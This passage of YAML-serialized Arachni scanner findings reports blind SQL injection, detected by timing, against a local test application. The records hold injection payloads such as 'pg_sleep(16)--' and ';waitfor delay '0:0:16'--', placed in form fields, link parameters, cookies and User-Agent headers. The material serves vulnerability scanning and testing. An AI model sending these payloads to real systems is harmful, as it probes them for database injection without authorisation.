cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/postgresql/form/straight
elem: form
method: POST
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": pg_sleep(16)--
:follow_location: true
:injected: pg_sleep(16)--
:combo:
!binary "aW5wdXQ=": pg_sleep(16)--
:action: http://localhost:12482/postgresql/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/postgresql/form/straight
injected: pg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/postgresql/form/append
elem: form
method: POST
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": defaultpg_sleep(16)--
:follow_location: true
:injected: defaultpg_sleep(16)--
:combo:
!binary "aW5wdXQ=": defaultpg_sleep(16)--
:action: http://localhost:12482/postgresql/form/append
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/postgresql/form/append
injected: defaultpg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/postgresql/link/straight?input=default
elem: link
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": pg_sleep(16)--
:follow_location: true
:injected: pg_sleep(16)--
:combo:
!binary "aW5wdXQ=": pg_sleep(16)--
:action: http://localhost:12482/postgresql/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/postgresql/link/straight?input=default
injected: pg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/postgresql/link/append?input=default
elem: link
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": defaultpg_sleep(16)--
:follow_location: true
:injected: defaultpg_sleep(16)--
:combo:
!binary "aW5wdXQ=": defaultpg_sleep(16)--
:action: http://localhost:12482/postgresql/link/append?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/postgresql/link/append?input=default
injected: defaultpg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie
url: http://localhost:12482/postgresql/cookie/straight
elem: cookie
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": pg_sleep(16)--
:injected: pg_sleep(16)--
:combo:
!binary "Y29va2ll": pg_sleep(16)--
:action: http://localhost:12482/postgresql/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:12482/postgresql/cookie/straight
injected: pg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=pg_sleep(16)--;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie2
url: http://localhost:12482/postgresql/cookie/append
elem: cookie
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie valuepg_sleep(16)--
:injected: cookie valuepg_sleep(16)--
:combo:
!binary "Y29va2llMg==": cookie valuepg_sleep(16)--
:action: http://localhost:12482/postgresql/cookie/append
:silent: true
:regexp: ''
var: cookie2
url: http://localhost:12482/postgresql/cookie/append
injected: cookie valuepg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+valuepg_sleep(16)--
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: User-Agent
url: http://localhost:12482/postgresql/header/append
elem: header
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_userpg_sleep(16)--
:injected: arachni_userpg_sleep(16)--
:combo:
User-Agent: arachni_userpg_sleep(16)--
:action: http://localhost:12482/postgresql/header/append
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:12482/postgresql/header/append
injected: arachni_userpg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_userpg_sleep(16)--
Cookie: cookie2=cookie+value;cookie=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: User-Agent
url: http://localhost:12482/postgresql/header/straight
elem: header
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
cGdfc2xlZXAoX19USU1FX18pLS0=
:skip_orig: true
:injected_orig: !binary |-
cGdfc2xlZXAoMTYpLS0=
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: pg_sleep(16)--
:injected: pg_sleep(16)--
:combo:
User-Agent: pg_sleep(16)--
:action: http://localhost:12482/postgresql/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:12482/postgresql/header/straight
injected: pg_sleep(16)--
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: pg_sleep(16)--
Cookie: cookie2=cookie+value;cookie=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mssql/form/straight
elem: form
method: POST
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ;waitfor delay '0:0:16'--
:follow_location: true
:injected: ;waitfor delay '0:0:16'--
:combo:
!binary "aW5wdXQ=": ;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mssql/form/straight
injected: ;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mssql/form/append
elem: form
method: POST
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default;waitfor delay '0:0:16'--
:follow_location: true
:injected: default;waitfor delay '0:0:16'--
:combo:
!binary "aW5wdXQ=": default;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/form/append
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mssql/form/append
injected: default;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mssql/link/straight?input=default
elem: link
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
